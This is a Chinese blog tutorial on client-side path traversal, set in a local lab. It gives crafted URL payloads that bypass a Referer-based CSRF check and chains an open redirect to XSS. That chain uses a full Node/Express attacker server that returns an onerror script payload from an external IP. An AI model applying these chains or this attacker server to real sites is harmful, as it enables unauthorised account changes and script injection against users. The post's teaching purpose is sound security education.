news 2026/4/3 1:48:34

CSPT漏洞浅析

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
CSPT漏洞浅析

CSPT全称是Client-Side Path Traversal ,即客户端路径遍历。

概念说明

CSPT 全称 Client-Side Path Traversal(客户端路径遍历),是一种针对前端应用的漏洞,核心是攻击者通过篡改 URL 参数、请求参数等,让浏览器(客户端)错误地向非预期的服务器路径发送请求,从而获取本不应访问的数据或资源。

它的本质是 “前端逻辑对参数校验不严格”,区别于传统的 “服务端路径遍历”(攻击目标是服务器文件系统):

攻击对象:浏览器的请求逻辑(而非服务器);

核心结果:让浏览器请求到开发者未开放的 API 接口、JSON 数据文件等;

如果配合其他漏洞,可能会触发或绕过达成某些漏洞的利用,多用于chain二次攻击。

跟上我的节奏,让我们揭开这个漏洞的神秘面纱。漏洞基本特征:

浏览器上访问 用户资料页面:

http://localhost:9999/public/profile.html?id=1

image

除了触发本身的前端页面外,还会触发一个api接口

api接口: http://localhost:9999/api/users/1

response返回:

image

api接口会把返回映射返回给前端输出响应。

用一张图总结下此特征:

image

修改id=123

http://localhost:9999/public/profile.html?id=123

image

后端会去尝试请求:

http://localhost:9999/api/users/123

那么这里大家发现没有,我们发现api路径上的id可控,即可

http://localhost:9999/api/users/{可控}

有这个特征,那么我们可以做什么?

输入http://localhost:9999/public/profile.html?id=../123

image

api会去请求http://localhost:9999/api/123

现在我们通过客户端(前端)的访问,任意控制后端api的路由走向。

单看CSPT漏洞,感觉这种行为没有任何意义。因为我们用户本身就可以访问api接口。

现在我们把CSPT代入到CSRF漏洞

可用业务场景1:

用户访问

http://localhost:9999/public/profile.html?id=1

image

输出用户信息 如id 姓名和头像。

站点内,我们发现了一个get请求的修改用户姓名的接口如下所示:

http://localhost:9999/api/profile?id=1&name=test

当我们直接访问他,它存在安全限制,csrf最常见的安全修复方案就是referer限制。

image

因为有referer限制,我无法csrf修改用户信息成功。那么此时CSPT漏洞的作用就来了。

已知:

http://localhost:9999/public/profile.html?id=1

返回接口:http://localhost:9999/api/users/1

构造可以csrf的CSPT接口:

http://localhost:9999/public/profile.html?id=../profile?id=1&name=test

因为是客户端漏洞,所以最好有必要对特殊字符串进行url编码下:

http://localhost:9999/public/profile.html?id=..%2fprofile%3fid%3d1%26name%3dtest

使用浏览器再次访问:

image

此时利用CSPT,我们成功绕过了csrf限制,通过网络数据请求,你能看到他携带了referer。

现在我们刷新我们的id=1的用户页面:

image

此时姓名已经被修改掉了,说明csrf成功。比起传统的referer url绕过,使用CSPT更加方便,更加智能。

可用业务场景2:

如果一个网站同时具备CSPT+api接口url跳转漏洞,那么此时我们可以把这个漏洞升级成一个xss漏洞。

那么我们来看看吧,怎么做?

首先是api接口的url跳转:

http://localhost:9999/redirect?url=https://example.com

image

这个url跳转,无法使用伪协议进行xss攻击。那么他的危害相对就小了,只能钓鱼。

小小的跳转,是如何和无用的CSPT配合的。

让我们回到最开始CSPT的业务现场:

访问http://localhost:9999/public/profile.html?id=1

触发api接口:http://localhost:9999/api/users/1

response返回:

{"id": 1, "name": "test", "profilePic": "/public/images/user1.jpg"}

image

api接口的json信息,会映射到前端页面上:

image

现在我们在api接口上发现了一个url跳转漏洞,那么此时思路就来了。我们能不能,有没有可能通过CSPT漏洞,请求api接口实现跳转,在页面上加载恶意的json返回?

这里直接上写好的利用代码:

const express = require('express');

const app = express();

// 配置 CORS 头,允许目标平台(localhost:9999)跨域读取

app.use((req, res, next) => {

console.log('收到请求:', req.method, req.url);

console.log('请求头:', req.headers);

res.setHeader('Access-Control-Allow-Origin', 'http://localhost:9999');

res.setHeader('Access-Control-Allow-Credentials', 'true');

// 不在这里统一设置Content-Type,让每个路由单独设置

res.setHeader('Access-Control-Allow-Methods', 'GET, POST, OPTIONS');

res.setHeader('Access-Control-Allow-Headers', 'Content-Type, Authorization');

res.setHeader('Access-Control-Max-Age', '86400');

next();

});

// 修改为专门支持CSPT漏洞利用的响应格式

app.get('/xss', (req, res) => {

console.log('处理/xss请求,为CSPT漏洞利用返回JSON格式响应');

res.setHeader('Content-Type', 'application/json');

const maliciousData = {

id: "<img src=\"x\" onerror=\"alert(321)\" />",

name: "hello",

profilePic: "/public/images/default.jpg"

};

console.log('发送JSON格式XSS响应:', JSON.stringify(maliciousData));

res.json(maliciousData);

});

const PORT = 5001;

app.listen(PORT, () => {

console.log(`攻击者服务(XSS 弹窗版)启动:http://localhost:${PORT}`);

});

远程服务器上使用node启动:

image

CSPT雏形:

http://localhost:9999/public/profile.html?id=1 ==>http://localhost:9999/api/users/1

演变:

http://localhost:9999/public/profile.html?id=../../redirect?url=https://example.com

==>

http://localhost:9999/public/profile.html?id=..%2f..%2fredirect%3furl%3dhttps%3a%2f%2fexample.com

==>

http://localhost:9999/redirect?url=https://example.com

==>

https://example.com

效果:

image

此时你会发现访问example.com的时候报错红色了。

image

所以这也解释了为什么利用攻击代码中为什么要设置Access-Control-*的原因。

万事俱备,直接利用实现xss吧:

http://localhost:9999/public/profile.html?id=../../redirect?url=http://38.207.176.172:5000/xss

==>

http://localhost:9999/public/profile.html?id=..%2F..%2Fredirect%3Furl%3Dhttp%3A%2F%2F38.207.176.172%3a5001%2fxss

==>

http://localhost:9999/redirect?url=http://38.207.176.172:5001/xss

==>

http://38.207.176.172:5001/xss

编码访问:

http://localhost:9999/public/profile.html?id=..%2F..%2Fredirect%3Furl%3Dhttp%3A%2F%2F38.207.176.172%3a5001%2fxss

image

页面渲染了api 返回内容,导致了xss攻击。

来看下为什么会xss攻击?

image

GET

http://38.207.176.172:5001/xss

response返回:

{"id":"<img src=\"x\" onerror=\"alert(321)\" />","name":"hello","profilePic":"/public/images/default.jpg"}

从代码角度来看:

userInfoDiv.innerHTML = `

<h2>用户信息</h2>

<p><strong>ID:</strong> ${data.id || '未知'}</p>

<p><strong>姓名:</strong> ${data.name || '未知'}</p>

<p><strong>头像:</strong> <img src="${data.profilePic || '/public/images/default.jpg'}" alt="用户头像" width="100" height="100"></p>

`;

image

通过url跳转伪造页面,实现渲染了用户植入的恶意代码。​

总结,要实现xss漏洞,我们需要必须条件?

1.支持CSPT特性

2.api接口存在url跳转漏洞

3.页面支持innerHTMl或者document.write输出。

这里选择了伪造id参数,id一般是数据库的key,是不可控的,即使是存在危险sink,也是无法xss,但是这里巧妙的利用了CSPT+url跳转漏洞实现了xss攻击。

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/3/30 16:25:02

【开题答辩全过程】以 高校教材征订系统设计与开发为例,包含答辩的问题和答案

个人简介一名14年经验的资深毕设内行人&#xff0c;语言擅长Java、php、微信小程序、Python、Golang、安卓Android等开发项目包括大数据、深度学习、网站、小程序、安卓、算法。平常会做一些项目定制化开发、代码讲解、答辩教学、文档编写、也懂一些降重方面的技巧。感谢大家的…

作者头像 李华
网站建设 2026/4/2 1:38:15

动态脱敏在微服务网关中的实现原理

关键词&#xff1a;动态脱敏、微服务网关、API网关、数据脱敏、RBAC、敏感数据保护、GDPR、等保2.0、安当技术引言&#xff1a;为什么微服务需要“会思考”的脱敏&#xff1f; 在单体架构时代&#xff0c;数据脱敏通常在应用层或数据库视图中完成。然而&#xff0c;随着微服务架…

作者头像 李华
网站建设 2026/3/26 20:22:42

Flex-Algo

文章目录为什么需要Flex-AlgoFlex-Algo是如何定义的Flex-Algo的算法示例Flex-Algo是如何工作的Flex-Algo是用户可以自主在IGP中创建单独拓扑并计算路径的灵活算法&#xff0c;目前主要在SR网络中使用。Flex-Algo提供了分离路由平面、约束TE路径、低延迟路由的简易解决方案&…

作者头像 李华
网站建设 2026/3/31 0:44:09

【钓鱼攻防】浅谈CobaltStrike钓鱼手法集锦

我其实不是好胜&#xff0c;我只是不想把这么美好的世界留给那帮傻子。 前言 网络安全技术学习&#xff0c;承认⾃⼰的弱点不是丑事&#xff0c;只有对原理了然于⼼&#xff0c;才能突破更多的限制。 拥有快速学习能力的安全研究员&#xff0c;是不能有短板的&#xff0c;有的只…

作者头像 李华
网站建设 2026/4/2 23:17:10

冯·诺依曼计算机原理:现代计算机的“大脑蓝图”

冯诺依曼计算机原理&#xff1a;现代计算机的“大脑蓝图”在我们每天使用的手机、电脑、智能手表甚至汽车中&#xff0c;都藏着一个看不见却无处不在的“大脑”——计算机。而这个“大脑”的基本工作方式&#xff0c;早在80年前就被一位天才科学家清晰地描绘出来。他就是约翰冯…

作者头像 李华